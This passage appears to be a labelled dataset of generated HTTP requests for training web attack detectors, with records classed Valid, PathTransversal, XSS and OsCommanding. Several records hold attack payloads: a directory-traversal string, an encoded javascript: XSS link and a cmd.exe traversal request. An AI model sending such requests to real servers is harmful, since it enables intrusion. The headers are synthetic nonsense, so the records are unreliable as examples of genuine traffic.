Range: 7-27394,731-8,0552-
Referer: /x0eaefi/5Aoient/vtte/oqhelsdt/ti8lgd.asp
TE: gzip;q=0.1,deflate;q=0.4,trailers
Trailer: Date
User-Agent: nHZKeopPH http://www.oye00.gov
UA-CPU: PowerPC
UA-Disp: 5168,522,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 040x521
Via: 7.8 55.30.169.222, HTTP/3.4 www.eehcz.gif, 2.1 130.246.193.17:4
Transfer-Encoding: deflate
Upgrade: ews/8.3
Warning: 447 www.bZeni6p.shtml "AoEoefv3atbtNidjY9e" 
X-Forwarded-For: 145.243.54.100
X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21329
Start - Id: 44697
class: PathTransversal
PUT /ptb810-DnG_uduKDGEEW/na.g3FDJkudo/sClQ.png? HTTP/1.0
Content-Length: 246
Content-Language: Czr1,mgfe5uOe
Content-Encoding: compress
Content-Location: http://www.argtnd.fr/dsbrod/ela6al/ruvlrrt/eip4tos/vTeitsre.jpg
Content-MD5: aXRuektpZmVvQXJvbnVwZw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Sep 06 06:10:41 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: 148.11.183.198:214
Connection: close
Accept: audio/x-wav;q=0.1
Accept-Charset: iso-8859-1;q=0.5, windows-1258, x-mac-chinesesimp;q=0.5, big5, x-mac-greek
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 11.102.132.216
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Wed, 02 Aug 06 07:05:56 CET
ETag: W/"J8-xNtKg_EqXjlggwFK"
Expect: 100-continue
From: nC0otao@cuVsd.gov
If-Modified-Since: Mon, 19 Dec 05 24:33:48 UTC
If-Unmodified-Since: Fri, 01 Aug 08 23:05:55 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 5
Pragma: frlkct=ete
Authorization: Digest qop=auth
Range: 2168-,8-1607,73-
Referer: /hhcMtrd.mpeg
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.9 (compatible; Konqueror/8.3; Windows NT; otqirdroc6)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2309x0531
Via: 8.9 193.116.9.112
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 357 40.108.38.139 "iffeRtaettasooe7nhmm" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~

xEtAfaejlrfttd=iframee&efAknlawlhGsir=h&sthccMIety=d5jrntresnNhjhi&QC_YdeletenG=29463725&qw=h@si_t&8rhya3ruTrh=h4nepn&nteEthnlrt=19&gfsESnik=./.././../&n5yIbpeu=omTeastbody&uoxunumdoea=g0qu8HUf&ceeaNSq=bxmlubgsound$ ooec&zm=exOofKdRyg

End - Id: 44697
Start - Id: 16855
class: Valid
GET /0Mnio6R/ceeituw9ldtos/mo2z8R3aER9lk8N9hTz.gif? HTTP/1.0
Host: 153.116.194.146
Connection: close
Accept: image/*, audio/basic;q=0.1, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale=560
Client-ip: 127.221.48.135
Cookie: orcoba4dce=421;os3o=lfaes1Ni5onmfrdth;esHeullh=2d bl-tlOrio0rt;uiloleetaM=t71ey
Cookie2: $Version="853"
Date: Thu, 27 Jul 06 14:11:40 GMT
ETag: W/"NzJ39WPaaLZYpa7Ev-D"
Expect: 100-continue
From: sad4d0o@e9nnxnucoh.be
If-Modified-Since: Thu, 18 May 06 08:30:39 CET
If-Unmodified-Since: Sat, 23 Jul 05 04:25:17 CET
If-Match: *
If-None-Match: "JzCNXzj-QFdiCwFra"
If-Range: Sun, 30 Aug 09 17:02:35 UTC
Max-Forwards: 3
MIME-Version: 8.8
Pragma: ahEu9i='yem'
Proxy-Authorization: Basic cHNjaWVyZXE6ZWlvY24=
Authorization: Basic aG9uaHRmOnNucGE=
Range: -2762
Referer: http://www.n3Tdon.it/nuhnpog/lzn8/j1lk6lrr.rar
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/4.8 (X11; U; Unix 4.8; hr-1o; rv:5.9.1) Gecko/69019574
UA-CPU: Sparc
UA-Disp: 199,9704,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 818x5345
Via: HTTP/1.8 112.47.233.27, 2myo3l/8.4 230.182.136.85, HTTP/4.9 www.suti.png
Transfer-Encoding: gzip
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 926077
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16855
Start - Id: 47372
class: XSS
GET /ttoarMsrte7uftentuiu/gj1k4rL/gass4saised1rsg7/9hRz/tGfC@@H./WDzYinsertlyD@/olsZuKz1hU0Nu6/htoptesl/6Pq0.K5EY.shtml?4it9s=e1Ah&tor=odFH3ortCtCb&FA8Iti0YkzWt=npIo&esn=saXfwjp&aobete7osniu8f=2vn9fcicOAl9osirl&w8t6x5aae3nd5uh=httpsarheddcu&119oraiC=%3Dam%5Dsrmaiig%3Agscriptnq7&bcEMib=9482963&keo=%3Ca+++++href++++%3D++++%22+++javas%26%2399%3Bript%26%2335%3B%5Balert++%28%27sizaoi%27%29%3B%5D+++%22+%3E&voesafec=484204&eeefsT=nM0rVh_0.&pt5wetonabm=aBa6nmriiLty&aTs=958 HTTP/1.1
Host: www.igeontuc.ch
Connection: teui0t
Accept: */*;q=0.1
Accept-Charset: windows-1258;q=0.2, gb2312;q=0.1, x-mac-turkish;q=0.8
Accept-Encoding: identity;q=0.2, deflate;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 61.200.67.223
Cookie: dLDa=ussntmstyleo;33gg@-aOcwYexec=erxgM.xnN;e4irioaAi=012643;rei4=og0eHmieieswp-G;0yeta=S7foNgcie9qyaqmHe
Cookie2: $Version="004"
Date: Mon, 14 Sep 09 10:53:19 CET
ETag: "pjFvTSd-Lm_V@ayZ5"
Expect: 100-continue
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Thu, 20 Jul 06 07:54:12 CET
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Mar 07 17:10:13 CET
Max-Forwards: 3659
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Digest qop=auth-int
Range: 35419-,75138-2674,165640-
Referer: http://ohAE.de/bwai/8efu4ain/7Aruaf.mp3
TE: deflate,trailers
Trailer: Trailer
User-Agent: asiuie/6.8.0.4
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 5.1 www.afOraAo.tiff, FTP/6.7 www.sRswaoe.png
Transfer-Encoding: deflate
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47372
Start - Id: 8333
class: Valid
GET /5wzrbi3R/rN7leinetEnuIHteh.php4?vorSQ7CF-S=braprkznphtTE&s9boasd=i5S7-kXJP&hivho8ueep=83959844&Vqz6LunY5=Ale9&hKCestnsDhUeo=eodropwindow.openueum+ausr3lah&U4UGb=622747495&a15arebhlRewn=270&SwinntZbXlg0sock_streamusD=122&oo=hexect&Rbmtsaoahnhico=+j&beac=eptei%5Cntd%40ae+y8&die=46&rbg5=a&gy_KCTopassthru=04653 HTTP/1.1
Host: www.Mott5ge.ch
Connection: close
Accept: text/plain;q=0.5, audio/x-wav;q=0.4, audio/x-wav;q=0.3
Accept-Charset: iso-8859-8-i
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 18.145.27.171
Cookie: 7eloRhelrstbNyv=8797546;et=r2.eTa9@J;zhygLnsnelseoet=+-ub-;tjd0eaisSuh9oen=46109
Cookie2: $Version="983"
Date: Thu, 25 Jun 09 02:55:01 GMT
ETag: W/"WxsOQ7ADJW3AI_dzI"
Expect: 100-continue
From: vAneoO@xoHsahh.it
If-Modified-Since: Mon, 19 Dec 05 16:26:55 UTC
If-Unmodified-Since: Tue, 06 Dec 05 24:33:47 UTC
If-Match: "xzVuca3_qO7wjd3U-BHz"
If-None-Match: "WxrfakjD4vwUC8Wqnyu"
If-Range: "pyfdY31RKZdI2r@z_lC7"
Max-Forwards: 6
MIME-Version: 9.5
Pragma: hdf5ttms='7TewrobI'
Proxy-Authorization: Digest qop=qdyeln
Authorization: ttiere znec=irwisa
Range: -79
Referer: http://www.raWir.org/ie8hh/oirH/2rswDC/8tAcn.wav
TE: gzip
Trailer: If-Range
User-Agent: srYgp48L http://www.htnH.uk
UA-CPU: MIPS
UA-Disp: 7385,2765,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 253x499
Via: FTP/2.7 7.166.182.7, 3.4 www.ct4eya.htm
Transfer-Encoding: compress
Upgrade: hriBn/8.0, oaktr/6.4, 2esx8/7.7, v4Da/4.6, abt/2.9
Warning: 661 72.235.243.164:83255 "ieRhwa7gJbie" 
X-Forwarded-For: 217.157.80.139
X-Serial-Number: 1014850915034096
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8333
Start - Id: 34431
class: Valid
PUT /9e8lSyqeledah8lnsi6/iUp9yrdes/efibpehvhhu/BT7Y-iYKimgKFd/he.NKCUnGiRJ@HsO-E/uAT/ptezl/Ozp1lTformuMpE9.mdb? HTTP/1.1
Content-Length: 193
Content-Language: untEhxl
Content-Encoding: gzip
Content-Location: /2carcie.nsf
Content-MD5: cGFoZWxpcDRsb3k4dGE4cw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Jul 09 20:07:22 CET
Last-Modified: Tue, 22 Jan 08 18:27:18 GMT
Host: www.4ssaidle.ch:64
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1257;q=0.8, x-mac-greek
Accept-Encoding: *
Accept-Language: aqfthte-rlhq, i-neai
Cache-Control: min-fresh=75
Client-ip: 48.191.175.197
Cookie: a75krdhpES=0346228
Cookie2: $Version="5"
Date: Wed, 19 Apr 06 15:04:02 CET
ETag: "Uyp0JpM@Bux9bNvn"
Expect: xz4epdk=csynkvu;uisaLsd=eOot4
From: uoYw@lieOqhc.ch
If-Modified-Since: Fri, 14 Dec 07 21:13:08 UTC
If-Unmodified-Since: Thu, 07 Sep 06 19:59:20 CET
If-Match: "DvhCNCwOgahdJimkGf"
If-None-Match: "dx_iENPGHeTs3C@u49x"
If-Range: "BRuQt@lkQjeKf2uzNez"
Max-Forwards: 3529
MIME-Version: 8.4
Pragma: O4=nit9da6m
Proxy-Authorization: if1e8w idii=psa0
Authorization: NTLM bm1nNGJ0SmxzZXNEaWFpdGxmMG1mY3BpaGEzb2Rjdm91ZlRpZXI2aXZu
Range: 80-9150
Referer: /sia5lla/igOseex/tnnnRei/lwsocoe.cfm
TE: trailers,deflate
Trailer: Pragma
User-Agent: Mozilla/6.2 (Windows; U; Win98 0.3; Nt-tn; rv:3.5.9) Gecko/36254291
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 840x4922
Via: FTP/3.3 www.tngTece.shtml
Transfer-Encoding: identity
Upgrade: nnygpo/3.3, eaI/0.2, rgsu/5.5, tsO/7.9, rdq/5.4
Warning: 308 www.np7yn.htm:41 "n0igvvaqAhh5Jitr5oc" "Sat, 07 Mar 09 13:36:33 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 22221039836
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7j_hLoo9Wand=nh&d0d=iYsn9n&ea=89&mznea=hk&qNl4ddah2ga=nd3&oo=50&aenO4nnonk=wMods&9At0vwtoerllf=i&N6ii=af\ll&LAie3ed=cSg&o4whi=3&Tnph-0o=;cechoe&E8=Sdoyoernuiwnixs&eaGccckysbcail=samvvs+tf

End - Id: 34431
Start - Id: 135
class: Valid
GET /F52JVuRGzh1-/hrmincwesnaxwe/spbqwalinsfeie/ohN/8rtieouip.png?uduiyisrtt=aNoe&hfeeao=514917&se1bia2taeg=eommd%40iyea&deusbia2dtieek=ertm1TpiioirtCetev&aa=tlr5ehio7ehcethhl&iomta5=eMVeHf-ypTh8&PaNlOrn0lded=childit HTTP/1.0
Host: 144.68.122.207
Connection: 7toxe
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=458
Client-ip: 70.224.224.21
Cookie: ethe2o=Asn;y0asjep3faf=92338064;eo8eb=3syeeeojUdEze1
Cookie2: $Version="83"
Date: Fri, 05 Jan 07 19:15:45 UTC
ETag: "SIuN7_jrhBm3Y8j"
Expect: um2W=aotibn
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Wed, 19 Nov 08 19:15:24 GMT
If-Unmodified-Since: Fri, 05 Nov 04 08:17:48 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Apr 07 20:59:24 GMT
Max-Forwards: 208
MIME-Version: 6.9
Pragma: hg5kl=AS
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: ch0te BnelAi=s8Cele
Range: 236168-3,-02800,-667295
Referer: /ehmm/zfaao/pdjep/hnof.cfm
TE: deflate,trailers,trailers
Trailer: Via
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 5.7; 7m-ho; rv:6.7.8) Gecko/49503828
UA-CPU: StrongARM
UA-Disp: 1257,262,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9197x616
Via: 8.4 13.252.121.36, 2.9 36.221.221.100
Transfer-Encoding: ilwtcu; cIrlxi=e0t4
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 375 www.o7pEa.htm "ehoeenamu" "Fri, 20 Oct 06 02:36:22 UTC"
X-Forwarded-For: 89.149.7.74
X-Serial-Number: 20731177155896988891
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 135
Start - Id: 43755
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.rG2edehe.be
Connection: close
Accept: */*
Accept-Charset: big5;q=0.4, utf-8, iso-8859-3;q=0.4, x-mac-arabic;q=0.9
Accept-Encoding: deflate, compress;q=0.2, gzip;q=0.6
Accept-Language: rAe-tettn2T, bt-of
Cache-Control: max-stale=5
Client-ip: 251.209.185.79
Cookie: 177system4YAi5=514;u2n9blpeD5=2295257394;ocoH=0776;hdzgiodpwAfew=mB dtesnph-systemaa~ y
Cookie2: $Version="1"
Date: Sun, 05 Apr 09 08:31:08 GMT
ETag: W/"eswt@0WOjNcHm0ay1zzd"
Expect: fe8gaSr=na4I2h
From: Reoco@amlrswscus.de
If-Modified-Since: Sun, 10 Oct 04 02:21:56 CET
If-Unmodified-Since: Sat, 14 Mar 09 15:03:08 GMT
If-Match: "1GH--iKf_fhk5Nb1."
If-None-Match: "0NigajImu8Ob2wpP"
If-Range: Tue, 19 Oct 04 05:08:13 GMT
Max-Forwards: 1414
MIME-Version: 7.8
Pragma: eeehof=da
Proxy-Authorization: Digest cnonce="rPoaihzn"
Authorization: e06y dDsTer88=iuemad
Range: 210020-381691,-20380,4976-
Referer: http://neeltlMt.cz/ocgr6njt/eesidos.tar.gz
TE: deflate,deflate,chunked;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.2 (compatible; Konqueror/3.3; Linux i586; 0qemoAnsen; dweg; fraqEt)
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7271x959
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: compress
Upgrade: 2Ytn/5.0, a8qtt/0.1
Warning: 960 13.127.188.120 "eVdond" 
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 442223002
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43755
Start - Id: 26640
class: Valid
GET /ye8ibbtshanns7o7ei/kyX2.wqM5rcvh9/ntuQyMa/HMC4ql/etcpozQuslxqnA2ieut/btM/gX4aDtnnxRyj_-j/sd42k/OhttpCAY@Tgusr./lCna6orbarp72C.mdb?dEo=9Q_sbAF67j&h86deixaha=552&ldal=7470918&Tmy=oductndzttehsN7 HTTP/1.0
Host: www.dHejeoe.com
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=5876
Client-ip: 153.234.34.138
Cookie: Cno5asgeri6=24879218;nwrknol=qeyrCP3t5dh0lu4;IesleTnwesdatmd=048786
Cookie2: $Version="70"
Date: Sun, 11 Apr 04 06:54:33 CET
ETag: W/"P3X1OeHkV9.rKn."
Expect: 100-continue
From: ent1Te@fuoo4x2ou.it
If-Modified-Since: Sat, 30 Apr 05 03:58:58 GMT
If-Unmodified-Since: Sun, 02 Aug 09 06:24:25 CET
If-Match: *
If-None-Match: "X7-bzSWEX4cAn.J"
If-Range: *
Max-Forwards: 9
MIME-Version: 5.1
Pragma: qcn=uoljy
Proxy-Authorization: NTLM NHRiZHJzb29Tc25lbnkzZG9lYWFKcmxlc2lyaXR0ZWV0bmFvc2Nhdg==
Authorization: Digest nonce
Range: 0-8818,879-
Referer: /wzw9Use/tmCidd.mp3
TE: trailers
Trailer: Accept-Encoding
User-Agent: hadkhtleIx/8.2.2.0.2
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 190x433
Via: 7.4 www.i2nTat2r.html, HTTP/4.9 www.Ylwheieh.tiff
Transfer-Encoding: rsnne; rnteAeeO=vneigei
Upgrade: iqeeh/8.0, lpstrb/3.7, 0ddrat/0.4, ieq/2.7, n5pdk/3.6
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 21651458708939157204
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26640
Start - Id: 26795
class: Valid
GET /c_-DvKTC3fBlA/r35c/7Q.js? HTTP/1.1
Host: www.m6riIef.de
Connection: close
Accept: video/*, text/xml;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fpe-iea;q=0.3
Cache-Control: only-if-cached
Client-ip: 41.148.162.64
Cookie: 9phpDbmLQ0dJV=9872;sWsi7ug=i0wiLUon7i;linksbyM= u~copyfnl|eunionnYeai'Te;ypvKo--ACA=Aeawnrpdyhsn
Cookie2: $Version="143"
Date: Mon, 26 Jul 04 14:34:17 UTC
ETag: W/"-bmXS9aTrVk3rN0XBmoY"
Expect: Wrsat=enelIl
From: kEqlnim@ntnj.ch
If-Modified-Since: Mon, 31 Dec 07 18:47:35 GMT
If-Unmodified-Since: Wed, 17 Feb 10 23:17:43 GMT
If-Match: *
If-None-Match: *
If-Range: "6QnY9jfMLsGIPiG"
Max-Forwards: 9276
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Oyha btrte=rWropxqe
Range: 2-,326240-959410
Referer: http://ea6n.it/t2ht0.exe
TE: deflate;q=0.4,trailers,chunked
Trailer: Host
User-Agent: tszo1ohbnt (rg4w2BTWNg; eOfm6T; eB3Y1oima; iyOTzIqr)
UA-CPU: StrongARM
UA-Disp: 795,5845,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3935x4964
Via: 6.5 www.lAcn.css, 7.5 www.inngnu.css, FTP/6.0 www.etti.css
Transfer-Encoding: compress
Upgrade: coar/9.8
Warning: 269 www.i6Whrlab.tiff:1 "5pHj" 
X-Forwarded-For: 63.148.52.222
X-Serial-Number: 51104
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26795
Start - Id: 13733
class: Valid
GET /qE4ot0CaegoxBAr/m1uk3/uN0p.bin?g5vtI=isl%7Ctymubo&ga75o=Cne3&sRr=xdelete%3EMl%3Dhrd&e7atde=n&rYsotaeewwuf=RW0lrcpf&ol75e=iE&iDikRiskd=thstnty&8eec=54552&H23tX=7vdd&etb1ouxe7GiRdan=aawesro0Eea&e0esicdEg=dTe1g1CU_2l HTTP/1.1
Host: www.itathrrn.de
Connection: keep-alive
Accept: video/quicktime;q=0.0, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 101.213.55.52
Cookie: c7rsc=098227070;hok=liMtIu_YJ;varoPsTpiM=dcq2;5metaRb= qkeeq;rvbscriptGFBOwHawhere=d6nege;3l=tb
Cookie2: $Version="764"
Date: Thu, 08 Mar 07 20:57:39 GMT
ETag: "v5vYfaYzxGzuvJWQV"
Expect: R2ra
From: ep4c@gnrwie6l.biz
If-Modified-Since: Sat, 23 May 09 16:34:52 CET
If-Unmodified-Since: Sat, 31 Oct 09 21:01:43 GMT
If-Match: "_ViZ_wS-zH8MXcM"
If-None-Match: "m75OlZ-GJDvpQ3SmeiC"
If-Range: Fri, 22 Apr 05 03:04:25 GMT
Max-Forwards: 02
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://sliaCear.fr/xlh1/4tmg/t5e1.mp3
Authorization: NTLM ZTVyNGJsbHB0QXNyZUlOaGVRZ29hZmVlaXJnaTkybmVydw==
Range: -4
Referer: /mt3t/fambnaoh/4Fllnl.sh
TE: trailers,trailers
Trailer: If-Range
User-Agent: pkeast8/5.1.3
UA-CPU: PowerPC
UA-Disp: 096,0301,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: HTTP/7.9 www.es8ad.jpeg, 4.7 145.49.22.199
Transfer-Encoding: compress
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 799 www.lntleEda.png "elhhrlui" "Wed, 06 May 09 15:39:09 GMT"
X-Forwarded-For: 170.219.207.191
X-Serial-Number: 6046766144734
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13733
Start - Id: 10649
class: Valid
GET /feu/NYO5window.openJWH/ekmqHYCaYv1/fmZUGsSs5ClM3bndQ@Vb/KUchildEdgE_naYTfq/adminQg/s_Kf/nYlEb8hexecR.9fx/rEG/sEiheusdutlngN.mspx?nbnlthgy=5+&orboT=960&9dio=785277&ihsew=1345611&ie3ixtduayersq=rtiI2nnx&apmlnsth=ot%40&e2tohaef=%27CfnoulT&n3XpE_=eHcFhuNH4A3&tGInin=dinch&Tardxr=0nxorn HTTP/1.1
Host: 98.15.132.97
Connection: Ra5t
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=1089
Client-ip: 177.159.146.53
Cookie: ulltplenst1se=zTe;rstnacaE=hdsxo6eoat;cirsori=WurjJflspoo;kdNs=W5wtetTs;meg=EtXpmhavingeh7lm;oehsehrt=mersystemqedMrhttps
Cookie2: $Version="106"
Date: Sun, 29 Nov 09 24:20:05 GMT
ETag: "y7_-.dl5zoaBrifsR"
Expect: IcnAn7
From: ahenthbe@eEs8aim.uk
If-Modified-Since: Tue, 25 Nov 08 06:29:37 UTC
If-Unmodified-Since: Wed, 14 Feb 07 16:08:12 GMT
If-Match: *
If-None-Match: "oVMLs4ECbTi96Tkdh"
If-Range: Thu, 02 Dec 04 12:08:05 UTC
Max-Forwards: 05
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic aXRlZWlhcjo5c2gw
Authorization: Basic ZmVHZ051czp6RGxB
Range: 6-0447,7686-38299,7705-
Referer: /lUDTC/ot6pb/ntwLrM/odtszcte.gif
TE: deflate;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: irltsy1olr
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4110x0979
Via: HTTP/2.2 www.r6r2o6i.jpg:9897
Transfer-Encoding: gzip
Upgrade: esd8yb/3.6, ebr7u/3.4, gieesh/7.2, iqtelo/1.1, oAp/5.7
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10649
Start - Id: 14907
class: Valid
GET /eesim7F5edrnmordoInd/ea/ojim16G0-i/i@Q@PQ/2msliwsLamj/KVperlko6SJt62V/6firozuofnb/4VS.0KdropH/wgunionTs_Aml3W/9f3.b2HkS0UOrL/ef0tt3iidhpta6sivaaA/mabPtCQA.vqgq.html?GCnsystemfU8sw=rpQshaN&nioere=9668&mXw8=3671598370&ttLchlsf=oYI71&jr9=LkUtnotes5oil2&fstpoawyslh4ye=wheregoh&pXiSrR0abN=m03BqPOHAy HTTP/1.0
Host: www.heiTeb.org
Connection: keep-alive
Accept: image/*
Accept-Charset: x-mac-korean
Accept-Encoding: *
Accept-Language: N-e3medee;q=0.5, dm-qha, gl8s-8hh, Soal-ptv;q=0.1, a-m;q=0.5
Cache-Control: dp9gh='kemoGt'
Client-ip: 80.243.239.27
Cookie: lPX7home0dtldhd=20120;pot623hydu=4605719
Cookie2: $Version="488"
Date: Wed, 26 Oct 05 09:40:41 UTC
ETag: "RFGfswz-cZFmM3r"
Expect: irjtg=mioo
From: rci1ha@regno3ir.ch
If-Modified-Since: Sat, 27 Aug 05 21:51:17 GMT
If-Unmodified-Since: Mon, 21 May 07 12:49:52 UTC
If-Match: "-vsNtRsPJdjvGtwJl.La"
If-None-Match: *
If-Range: "F00YRF3Cw.oHRL_"
Max-Forwards: 4
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzYWc6NnhzNnlsb3M=
Authorization: 8arok qv5onc=oOsc
Range: 09234-
Referer: /fcnogaaw/Eoeh.msf
TE: chunked
Trailer: From
User-Agent: ErDsRo (hM43qH)
UA-CPU: StrongARM
UA-Disp: 8593,9918,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: 0.8 225.65.218.13, FTP/8.9 www.iystef.jpeg
Transfer-Encoding: gzip
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 580548431954980
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14907
Start - Id: 9854
class: Valid
GET /Fperl54ZIHlscriptt9_eGR/pavcRiAoreyHoaet/188mc.1dv4KjVHzP6/5-_/eYYJbgrOY1OA6INv/eu8OAoX/uitysmuAalr8dolO5yd.gif?rit=78088381&zN.Idb5uNI4b=o HTTP/1.0
Host: www.vorepaa00.net:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 92.47.175.223
Cookie: rjor=nrcp+gt1tnrc1t;difehiY0nibusw=reo;ppba=oaoteiateoeeiapNu
Cookie2: $Version="046"
Date: Wed, 29 Mar 06 22:36:19 UTC
ETag: W/"-@51lHPVg3LcenR3M6."
Expect: satevs=iaeudWh;t9isT
From: eysn4@teOuatxl.org
If-Modified-Since: Mon, 15 Oct 07 17:03:54 CET
If-Unmodified-Since: Mon, 25 Dec 06 04:56:33 CET
If-Match: "8w_QWhcoK44kwXZ"
If-None-Match: *
If-Range: Wed, 18 Mar 09 12:39:31 UTC
Max-Forwards: 34
MIME-Version: 1.8
Pragma: 0=90nawE
Proxy-Authorization: Basic aXMwZW5ibmU6ZW9pZWhnNA==
Authorization: NTLM aW91dHJ1ZGhzcmN5c2NybjJzZWFjek95b3FzYmlvbjZlc2VpbGptbmd0aUFhYmU=
Range: -116,600-315,197733-5
Referer: http://www.hhok.org/c0teoivi.sh
TE: chunked;q=0.9
Trailer: If-None-Match
User-Agent: Ep1tDsa/0.8.3.5.7
UA-CPU: MIPS
UA-Disp: 1962,9364,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 803x940
Via: 0.2 78.78.227.101:8663
Transfer-Encoding: compress
Upgrade: dsi/0.4
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 148.39.4.192
X-Serial-Number: 09946739061718
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9854
Start - Id: 29675
class: Valid
